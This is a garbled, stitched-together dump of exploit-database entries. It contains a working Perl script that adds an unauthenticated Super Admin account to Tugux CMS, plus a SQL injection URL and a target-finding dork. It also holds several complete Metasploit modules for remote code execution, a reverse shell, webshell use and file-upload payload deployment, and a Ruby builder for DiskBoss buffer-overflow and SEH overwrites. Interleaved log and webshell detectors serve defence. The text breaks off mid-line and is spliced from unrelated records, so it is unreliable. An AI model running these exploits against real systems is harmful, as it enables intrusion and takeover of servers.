ID : 1337DAY-ID-15639
Type : zdt
Reporter : Aodrulez
Modified : 2011-03-18T00:00:00
Description : Exploit for PHP platform in category web applications
Vulnerable Web-App : Tugux CMS 1.0_final
Vulnerability : Multiple Vulnerabilities.
Author : Aodrulez. (Atul Alex Cherian)
Email : f3arm3d3ar@gmail.com
Google-Dork : "Copyright 2010-2011 Tugux CMS"
Tested on : Ubuntu 10.04
Web-App : http://sourceforge.net/projects/tuguxcms/
+---------+
| Details |
+---------+
1] SQLi
Exploit : http://localhost/latest.php?nid=9'[sqli]
2] "create_admin_parse.php"
Vulnerability : Can be used to add Super Admin accounts without any authentication. :)
+--------------------+
| Exploit (Perl Code)|
+--------------------+
(This exploit will add a new Super Admin account)
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP 5.64;
my $browser = LWP::UserAgent->new();
my $url=$ARGV[0];
print "+----------------------------------------+\n";
print "| Tugux CMS 1.0 Multiple Vulnerabilities |\n";
print "+----------------------------------------+\n\n";
print "Author : Aodrulez.\n";
print "Email : f3arm3d3ar\@gmail.com\n";
print "Google-Dork : \"Copyright 2010-2011 Tugux CMS\"\n";
if(!$url)
{die ("\nPlease enter the target url. Ex. perl $0 http://www.test.com");}
my $exploit='/administrator/create_admin_parse.php';
print "\n[+] Creating a new Super Admin \\m/";
$response = HTTP::Request->new(POST => $url.$exploit) or die("\n Connection Error!");
$response->content_type("application/x-www-form-urlencoded");
$response->content("username=Aodrulez&pass1=aod&type=a");
my $data=$browser->request($response)->as_string;
if($data!~m/HTTP\/1.1 200 OK/){ die ("\n$url Not Vulnerable!\n");}
print "\n[!] Admin Username : Aodrulez\n[!] Admin Password : aod\n[!] Type : Super Admin.\n";
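Added here as a defender-side check, not part of the original advisory: a Python script that scans web-server access logs for the two attack patterns above, quote or keyword characters in the nid parameter of latest.php and POSTs to /administrator/create_admin_parse.php. It assumes the standard Apache/Nginx "combined" log format; the sample log lines are constructed, and the libwww-perl User-Agent heuristic rests on LWP's default agent string, not on anything in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Standard Apache/Nginx "combined" log format (assumption: the CMS sits
# behind a web server writing this format; referer/user-agent are optional).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Characters and keywords that never belong in a numeric article id.
SQLI_MARKERS = re.compile(r"""['\"]|--|/\*|#|\bunion\b|\bselect\b|\bsleep\(|\bbenchmark\(""", re.I)

ADMIN_CREATE = "/administrator/create_admin_parse.php"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_indicators(entry):
    """Return the list of advisory-related indicators found in one parsed entry."""
    hits = []
    url = urlsplit(entry["target"])
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values

    # 1] SQLi: latest.php expects an integer nid; anything else is suspect.
    if url.path.endswith("/latest.php") and "nid" in params:
        for value in params["nid"]:
            if not value.isdigit():
                hits.append("latest.php nid is not an integer: %r" % value)
            if SQLI_MARKERS.search(value):
                hits.append("latest.php nid contains SQL metacharacters")

    # 2] Unauthenticated admin creation: the script performs no auth check,
    #    so every POST to it should be reconciled against the admin table.
    if url.path.endswith(ADMIN_CREATE) and entry["method"] == "POST":
        hits.append("POST to create_admin_parse.php (possible Super Admin creation)")
        # The advisory's Perl exploit uses LWP, whose default User-Agent is
        # "libwww-perl/<version>"; a weak but cheap secondary signal.
        if (entry.get("ua") or "").startswith("libwww-perl"):
            hits.append("User-Agent libwww-perl matches the published exploit")
    return hits


def scan(lines):
    """Return a list of (ip, timestamp, indicators) for every line that triggers an indicator."""
    findings = []
    for line in lines:
        entry = parse_line(line.rstrip("\n"))
        if not entry:
            continue
        hits = find_indicators(entry)
        if hits:
            findings.append((entry["ip"], entry["ts"], hits))
    return findings


# Constructed sample log (not real traffic); addresses are from RFC 5737 test ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Mar/2011:10:00:01 +0000] "GET /latest.php?nid=9 HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Mar/2011:10:00:07 +0000] "GET /latest.php?nid=9%27%20AND%201=1-- HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Mar/2011:10:01:42 +0000] "POST /administrator/create_admin_parse.php HTTP/1.1" 200 0 "-" "libwww-perl/5.837"
203.0.113.9 - - [18/Mar/2011:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, ts, hits in scan(SAMPLE_LOG.splitlines()):
        print(ip, ts)
        for h in hits:
            print("   -", h)
```

A flagged POST to create_admin_parse.php is only confirmed by checking the CMS admin table for an account created at that timestamp, which the log alone cannot show.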
+-------------------+
| Greetz Fly Out To |
+-------------------+
1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in
+-------+
| Quote |
+-------+
"FREEDOM! FOREVER!" - Aodrulez
# 0day.today [2018-03-06] #
Enterprise v8\\.2\\.14/\n mytarget = targets[3]\n end\n end\n\n if !mytarget\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n end\n\n case mytarget\n when targets[1], targets[2]\n sploit = make_nops(21)\n sploit << payload.encoded\n sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)\n sploit << [mytarget.ret].pack('V')\n sploit << rand_text_alpha(2500)\n when targets[3]\n seh = generate_seh_record(mytarget.ret)\n sploit = payload.encoded\n sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)\n sploit[sploit.length, seh.length] = seh\n sploit << make_nops(10)\n sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode\n sploit << rand_text_alpha(5000 - sploit.length)\n else\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/diskboss_get_bof.rb"}, {"lastseen": "2019-11-24T06:42:08", "bulletinFamily": "exploit", "description": "This module exploits the \"diagnostic console\" feature in the Metasploit Web UI to obtain a reverse shell. The diagnostic console is able to be enabled or disabled by an administrator on Metasploit Pro and by an authenticated user on Metasploit Express and Metasploit Community. When enabled, the diagnostic console provides access to msfconsole via the web interface. An authenticated user can then use the console to execute shell commands. NOTE: Valid credentials are required for this module. 
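The DiskBoss module above uses two different buffer layouts: a saved-return-address overwrite for v7.4.28 and v7.5.12 (21 NOPs, payload, filler to the offset, an `ADD ESP,0x68 # RETN` gadget, trailing junk) and an SEH overwrite for v8.2.14 (payload, filler, the SEH record, 10 NOPs, a near jump back into the payload, padding to 5000 bytes). The Ruby below is an added example, not the module's code, that lays out both buffers deterministically so the offsets can be inspected. The SEH record shape (short jump over the handler pointer, two pad bytes, handler address) and the fixed filler letters are assumptions; Metasploit's `generate_seh_record` and `rand_text_alpha` produce the real bytes.

```ruby
# Near jmp rel32, the encoding Rex::Arch::X86.jmp emits.
def jmp_rel32(rel)
  "\xE9".b + [rel & 0xffffffff].pack('V')
end

# SEH record shape: nSEH is a short jump over the handler pointer (padded to
# four bytes), then the handler address. Metasploit's generate_seh_record may
# pick different pad bytes; the two NOPs here are an assumption.
def seh_record(handler)
  "\xEB\x06\x90\x90".b + [handler].pack('V')
end

# Targets 1 and 2 (v7.4.28, v7.5.12): plain return-address overwrite with an
# ADD ESP,0x68 # RETN gadget. Layout: 21 NOPs, payload, filler to the saved
# return address, gadget address, trailing filler.
def ret_overwrite_buffer(payload, offset:, ret:)
  raise ArgumentError, 'payload longer than offset' if payload.bytesize > offset
  buf  = "\x90".b * 21
  buf << payload.b
  buf << 'A'.b * (offset - payload.bytesize)
  buf << [ret].pack('V')
  buf << 'B'.b * 2500
end

# Target 3 (v8.2.14): SEH overwrite. Layout: payload, filler to the SEH
# record, POP POP RET handler, 10 NOPs, near jmp back into the payload, filler
# to the fixed request size.
def seh_overwrite_buffer(payload, offset:, ret:, jmp_back: 0xffffbf25, total: 5000)
  raise ArgumentError, 'payload longer than offset' if payload.bytesize > offset
  buf  = payload.b
  buf << 'A'.b * (offset - payload.bytesize)
  buf << seh_record(ret)
  buf << "\x90".b * 10
  buf << jmp_rel32(jmp_back)
  raise ArgumentError, 'buffer exceeds request size' if buf.bytesize > total
  buf << 'C'.b * (total - buf.bytesize)
end

# Handler pointer as the target would read it from the record.
def seh_handler_at(buf, offset)
  buf.byteslice(offset + 4, 4).unpack1('V')
end
```

Because the whole buffer travels as the GET request path, every byte must avoid the module's bad characters (`\x00\x09\x0a\x0d\x20`); the letter filler used here does, and the payload would have to be encoded to do the same.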
Tested against: Metasploit Community 4.1.0, Metasploit Community 4.8.2, Metasploit Community 4.12.0\n", "modified": "2017-07-24T13:26:21", "published": "2016-09-09T10:28:13", "id": "MSF:EXPLOIT/MULTI/HTTP/METASPLOIT_WEBUI_CONSOLE_COMMAND_EXECUTION", "href": "", "type": "metasploit", "title": "Metasploit Web UI Diagnostic Console Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Metasploit Web UI Diagnostic Console Command Execution',\n 'Description' => %q{\n This module exploits the \"diagnostic console\" feature in the Metasploit\n Web UI to obtain a reverse shell.\n\n The diagnostic console is able to be enabled or disabled by an\n administrator on Metasploit Pro and by an authenticated user on\n Metasploit Express and Metasploit Community. 
When enabled, the\n diagnostic console provides access to msfconsole via the web interface.\n An authenticated user can then use the console to execute shell\n commands.\n\n NOTE: Valid credentials are required for this module.\n\n Tested against:\n\n Metasploit Community 4.1.0,\n Metasploit Community 4.8.2,\n Metasploit Community 4.12.0\n },\n 'Author' => [ 'Justin Steven' ], # @justinsteven\n 'License' => MSF_LICENSE,\n 'Privileged' => true,\n 'Arch' => ARCH_CMD,\n 'Payload' => { 'PayloadType' => 'cmd' },\n 'Targets' =>\n [\n [ 'Unix',\n {\n 'Platform' => [ 'unix' ]\n }\n ],\n [ 'Windows',\n {\n 'Platform' => [ 'windows' ]\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 23 2016'\n ))\n\n register_options(\n [\n OptBool.new('SSL', [ true, 'Use SSL', true ]),\n OptPort.new('RPORT', [ true, '', 3790 ]),\n OptString.new('TARGETURI', [ true, 'Metasploit Web UI base path', '/' ]),\n OptString.new('USERNAME', [ true, 'The user to authenticate as' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\n ])\n end\n\n def do_login()\n\n print_status('Obtaining cookies and authenticity_token')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login'),\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to retrieve login page')\n end\n\n unless res.headers.include?('Set-Cookie') && res.body =~ /name=\"authenticity_token\"\\W+.*\\bvalue=\"([^\"]*)\"/\n fail_with(Failure::UnexpectedReply, \"Couldn't find cookies or authenticity_token. 
Is TARGETURI set correctly?\")\n end\n\n authenticity_token = $1\n session = res.get_cookies\n\n print_status('Logging in')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'user_sessions'),\n 'cookie' => session,\n 'vars_post' =>\n {\n 'utf8' => '\\xE2\\x9C\\x93',\n 'authenticity_token' => authenticity_token,\n 'user_session[username]' => datastore['USERNAME'],\n 'user_session[password]' => datastore['PASSWORD'],\n 'commit' => 'Sign in'\n }\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to log in')\n end\n\n return res.get_cookies, authenticity_token\n\n end\n\n def get_console_status(session)\n\n print_status('Getting diagnostic console status and profile_id')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'settings'),\n 'cookie' => session,\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to get diagnostic console status or profile_id')\n end\n\n unless res.body =~ /\\bid=\"profile_id\"\\W+.*\\bvalue=\"([^\"]*)\"/\n fail_with(Failure::UnexpectedReply, 'Failed to get profile_id')\n end\n\n profile_id = $1\n\n if res.body =~ /<input\\W+.*\\b(id=\"allow_console_access\"\\W+.*\\bchecked=\"checked\"|checked=\"checked\"\\W+.*\\bid=\"allow_console_access\")/\n console_status = true\n elsif res.body =~ /<input\\W+.*\\bid=\"allow_console_access\"/\n console_status = false\n else\n fail_with(Failure::UnexpectedReply, 'Failed to get diagnostic console status')\n end\n\n print_good(\"Console is currently: #{console_status ? 'Enabled' : 'Disabled'}\")\n\n return console_status, profile_id\n\n end\n\n def set_console_status(session, authenticity_token, profile_id, new_console_status)\n print_status(\"#{new_console_status ? 
'Enabling' : 'Disabling'} diagnostic console\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'settings', 'update_profile'),\n 'cookie' => session,\n 'vars_post' =>\n {\n 'utf8' => '\\xE2\\x9C\\x93',\n '_method' => 'patch',\n 'authenticity_token' => authenticity_token,\n 'profile_id' => profile_id,\n 'allow_console_access' => new_console_status,\n 'commit' => 'Update Settings'\n }\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to set status of diagnostic console')\n end\n\n end\n\n def get_container_id(session, container_label)\n\n container_label_singular = container_label.gsub(/s$/, \"\")\n\n print_status(\"Getting ID of a valid #{container_label_singular}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, container_label),\n 'cookie' => session,\n })\n\n unless res && res.body =~ /\\bid=\"#{container_label_singular}_([^\"]*)\"/\n print_warning(\"Failed to get a valid #{container_label_singular} ID\")\n return\n end\n\n container_id = $1\n\n vprint_good(\"Got: #{container_id}\")\n\n container_id\n\n end\n\n def get_console(session, container_label, container_id)\n\n print_status('Creating a console, getting its ID and authenticity_token')\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'console'),\n 'cookie' => session,\n })\n\n unless res && res.headers['location']\n fail_with(Failure::UnexpectedReply, 'Failed to get a console ID')\n end\n\n console_id = res.headers['location'].split('/')[-1]\n\n vprint_good(\"Got console ID: #{console_id}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),\n 'cookie' => session,\n })\n\n unless res && res.body =~ /console_init\\('console', 'console', '([^']*)'/\n fail_with(Failure::UnexpectedReply, 'Failed to get console authenticity_token')\n end\n\n 
console_authenticity_token = $1\n\n return console_id, console_authenticity_token\n\n end\n\n def run_command(session, container_label, console_authenticity_token, container_id, console_id, command)\n\n print_status('Running payload')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),\n 'cookie' => session,\n 'vars_post' =>\n {\n 'read' => 'yes',\n 'cmd' => command,\n 'authenticity_token' => console_authenticity_token,\n 'last_event' => '0',\n '_' => ''\n }\n })\n\n unless res\n fail_with(Failure::NotFound, 'Failed to run command')\n end\n\n end\n\n def exploit\n\n session, authenticity_token = do_login()\n\n original_console_status, profile_id = get_console_status(session)\n\n unless original_console_status\n set_console_status(session, authenticity_token, profile_id, true)\n end\n\n if container_id = get_container_id(session, \"workspaces\")\n # target calls them \"workspaces\"\n container_label = \"workspaces\"\n elsif container_id = get_container_id(session, \"projects\")\n # target calls them \"projects\"\n container_label = \"projects\"\n else\n fail_with(Failure::Unknown, 'Failed to get workspace ID or project ID. Cannot continue.')\n end\n\n console_id, console_authenticity_token = get_console(session, container_label,container_id)\n\n run_command(session, container_label, console_authenticity_token,\n container_id, console_id, payload.encoded)\n\n unless original_console_status\n set_console_status(session, authenticity_token, profile_id, false)\n end\n\n handler\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/metasploit_webui_console_command_execution.rb"}, {"lastseen": "2019-11-26T19:07:52", "bulletinFamily": "exploit", "description": "This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. 
The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader, silently installing malware if found.\n", "modified": "2017-07-24T13:26:21", "published": "2016-08-19T13:29:55", "id": "MSF:EXPLOIT/MULTI/HTTP/PHOENIX_EXEC", "href": "", "type": "metasploit", "title": "Phoenix Exploit Kit Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Phoenix Exploit Kit Remote Code Execution',\n 'Description' => %q{\n This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The\n Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the\n presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,\n silently installing malware if found.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CrashBandicot', #initial discovery by @DosPerl\n 'Jay Turla' #msf module by @shipcod3\n ],\n 'References' =>\n [\n [ 'EDB', '40047' ],\n [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit\n [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'DisclosureDate' => 'Jul 01 2016',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php'])\n ])\n end\n\n def check\n test = Rex::Text.rand_text_alpha(8)\n res = 
http_send_command(\"echo \\\"#{test}\\\";\")\n if res && res.body.include?(test)\n return Exploit::CheckCode::Vulnerable\n end\n Exploit::CheckCode::Safe\n end\n\n def exploit\n encoded = Rex::Text.encode_base64(payload.encoded)\n http_send_command(\"eval(base64_decode(\\\"#{encoded}\\\"));\")\n end\n\n def http_send_command(cmd)\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => {\n 'bdr' => cmd\n }\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/phoenix_exec.rb"}, {"lastseen": "2019-11-07T17:19:18", "bulletinFamily": "exploit", "description": "This module takes advantage of the China Chopper Webshell that is commonly used by Chinese hackers.\n", "modified": "2017-07-24T13:26:21", "published": "2015-11-02T08:54:18", "id": "MSF:EXPLOIT/MULTI/HTTP/CAIDAO_PHP_BACKDOOR_EXEC", "href": "", "type": "metasploit", "title": "China Chopper Caidao PHP Backdoor Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'China Chopper Caidao PHP Backdoor Code Execution',\n 'Description' => %q{\n This module takes advantage of the China Chopper Webshell that is\n commonly used by Chinese hackers.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Nixawk'],\n 'References' =>\n [\n ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],\n ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],\n ['URL', 
'https://www.us-cert.gov/ncas/alerts/TA15-313A']\n ],\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 27 2015',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),\n OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper'])\n ])\n end\n\n def http_send_command(code)\n code = \"eval(base64_decode(\\\"#{Rex::Text.encode_base64(code)}\\\"));\"\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_post' => {\n \"#{datastore['PASSWORD']}\" => code\n }\n })\n end\n\n def check\n flag = Rex::Text.rand_text_alpha(16)\n res = http_send_command(\"printf(\\\"#{flag}\\\");\")\n if res && res.body =~ /#{flag}/m\n Exploit::CheckCode::Vulnerable\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n print_status(\"Sending exploit...\")\n http_send_command(payload.raw)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/caidao_php_backdoor_exec.rb"}, {"lastseen": "2019-11-26T06:50:42", "bulletinFamily": "exploit", "description": "This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus. The vulnerability exists in the FileUploader servlet which accepts unauthenticated file uploads. This module has been tested successfully on versions v9 b9000 - b9102 in Windows and Linux. 
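The two modules above (Phoenix `geoip.php` and the China Chopper Caidao backdoor) drive the same primitive from opposite directions: PHP source handed to `eval()`, either plainly in a query parameter or wrapped as `eval(base64_decode("..."))` in a POST parameter named after the shell password. The Ruby below is an added detection example, not code from either module. It runs a small classifier over constructed requests shaped like the ones the modules send (the bodies are written here, not captured), decoding base64-looking runs so wrapped code is inspected too.

```ruby
require 'base64'
require 'cgi'

# Constructed sample requests in the shape the two modules send (not captured
# traffic): the Phoenix 'bdr' query parameter and the Caidao POST parameter
# named after the shell password.
SAMPLES = [
  ['GET',  '/Phoenix/includes/geoip.php?bdr=' + CGI.escape('echo "abcdefgh";'), ''],
  ['GET',  '/Phoenix/includes/geoip.php?bdr=' +
           CGI.escape('eval(base64_decode("' + Base64.strict_encode64('system("id");') + '"));'), ''],
  ['POST', '/caidao.php',
           'chopper=' + CGI.escape('eval(base64_decode("' + Base64.strict_encode64('printf("xyz");') + '"));')],
  ['POST', '/caidao.php', 'chopper=' + CGI.escape(Base64.strict_encode64('system("id");'))],
  ['GET',  '/index.php?page=about', '']
]

EVAL_RE    = /\beval\s*\(/i
PHPCODE_RE = /\b(system|exec|passthru|shell_exec|assert|printf)\s*\(|\becho\s+["']/i

# Decode every base64-looking run so wrapped code is inspected as well.
def base64_blobs(s)
  s.scan(%r{[A-Za-z0-9+/]{8,}={0,2}}).map { |b| Base64.decode64(b) }
end

# Returns [verdict, reason] for one request.
def classify(method, path, body)
  params  = CGI.parse(path.split('?', 2)[1].to_s).values.flatten
  params += CGI.parse(body.to_s).values.flatten if method == 'POST'
  params.each do |v|
    return [:webshell, 'eval() in parameter'] if v.match?(EVAL_RE)
    return [:webshell, 'PHP code in parameter'] if v.match?(PHPCODE_RE)
    base64_blobs(v).each do |d|
      return [:webshell, 'base64-wrapped PHP in parameter'] if d.match?(PHPCODE_RE) || d.match?(EVAL_RE)
    end
  end
  [:clean, nil]
end

def scan(samples = SAMPLES)
  samples.map { |m, p, b| [p, *classify(m, p, b)] }
end
```

Both modules' `check` methods echo a random marker through the backdoor, so the first sample (a bare `echo` with a quoted string) is the kind of probe a detection should catch as well as the payload itself. The parameter name in the Caidao case is the shell password, so matching on value content rather than on a fixed parameter name is what makes the rule hold.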
The MSP versions do not expose the vulnerable servlet.\n", "modified": "2017-07-24T13:26:21", "published": "2015-10-02T15:04:05", "id": "MSF:EXPLOIT/MULTI/HTTP/MANAGEENGINE_SD_UPLOADER", "href": "", "type": "metasploit", "title": "ManageEngine ServiceDesk Plus Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine ServiceDesk Plus Arbitrary File Upload',\n 'Description' => %q{\n This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus.\n The vulnerability exists in the FileUploader servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on versions v9 b9000 - b9102\n in Windows and Linux. 
The MSP versions do not expose the vulnerable servlet.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'ZDI', '15-396 ' ],\n [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/6038' ]\n ],\n 'DefaultOptions' => { 'WfsDelay' => 30 },\n 'Privileged' => false, # Privileged on Windows but not on Linux targets\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'ServiceDesk Plus v9 b9000 - b9102 / Java Universal', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 20 2015'))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptInt.new('SLEEP',\n [true, 'Seconds to sleep while we wait for EAR deployment', 15]),\n ])\n end\n\n\n def check\n res = send_request_cgi({\n 'uri' => \"/\",\n 'method' => 'GET'\n })\n\n if res && res.code == 200 &&\n res.body.to_s =~ /src='\\/scripts\\/Login\\.js\\?([0-9]+)'><\\/script>/\n build = $1\n if build < \"9103\" && build > \"9000\"\n return Exploit::CheckCode::Appears\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n jboss_path = '../../server/default/deploy'\n servlet_path = rand_text_alphanumeric(4 + rand(16 - 4)) + \".up\"\n\n # First we generate the WAR with the payload...\n war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))\n war_payload = payload.encoded_war({ :app_name => war_app_base })\n\n # ... 
and then we create an EAR file with it.\n ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))\n app_xml = %Q{<?xml version=\"1.0\" encoding=\"UTF-8\"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + \".war\"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}\n\n # Zipping with CM_STORE to avoid errors while decompressing the zip\n # in the Java vulnerable application\n ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)\n ear_file.add_file(war_app_base + \".war\", war_payload.to_s)\n ear_file.add_file(\"META-INF/application.xml\", app_xml)\n ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + \".ear\"\n\n # Linux doesn't like it when we traverse non existing directories,\n # so let's create them by sending some random data before the EAR.\n rand_file = rand_text_alphanumeric(4 + rand(32 - 4))\n res = send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'uniqueId' => rand_text_numeric(4 + rand(4)),\n 'module' => '',\n 'qqfile' => rand_file\n }\n })\n\n print_status(\"Uploading EAR file...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(servlet_path),\n 'method' => 'POST',\n 'data' => ear_file.pack,\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'uniqueId' => rand_text_numeric(4 + rand(4)),\n 'module' => jboss_path,\n 'qqfile' => ear_file_name\n }\n })\n\n if res && res.code == 200\n print_good(\"Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\n \" seconds for deployment\")\n register_files_for_cleanup(jboss_path.gsub('../../','../') + \"/null/\" + ear_file_name)\n register_files_for_cleanup(\"Attachments/null/\" + rand_file)\n sleep(datastore['SLEEP'])\n else\n fail_with(Failure::Unknown, \"#{peer} - EAR upload failed\")\n end\n\n send_request_cgi({\n 
'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\n 'method' => 'GET'\n })\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/manageengine_sd_uploader.rb"}], "packetstorm": [{"lastseen": "2017-10-27T14:05:49", "bulletinFamily": "exploit", "description": "", "modified": "2017-10-26T00:00:00", "published": "2017-10-26T00:00:00", "href": "https://packetstormsecurity.com/files/144764/Mura-CMS-Server-Side-Request-Forgery-XXE-Injection.html", "id": "PACKETSTORM:144764", "type": "packetstorm", "title": "Mura CMS Server-Side Request Forgery / XXE Injection", "sourceData": "`# Exploit Title: Mura CMS before 6.2 SSRF + XXE \n# Date: 30-10-2017 \n# Exploit Author: Anthony Cole \n# Vendor Homepage: http://www.getmura.com/ \n# Version: before 6.2 \n# Contact: http://twitter.com/acole76 \n# Website: http://twitter.com/acole76 \n# Tested on: Windows 2008 w/ Coldfusion 8 \n# CVE: 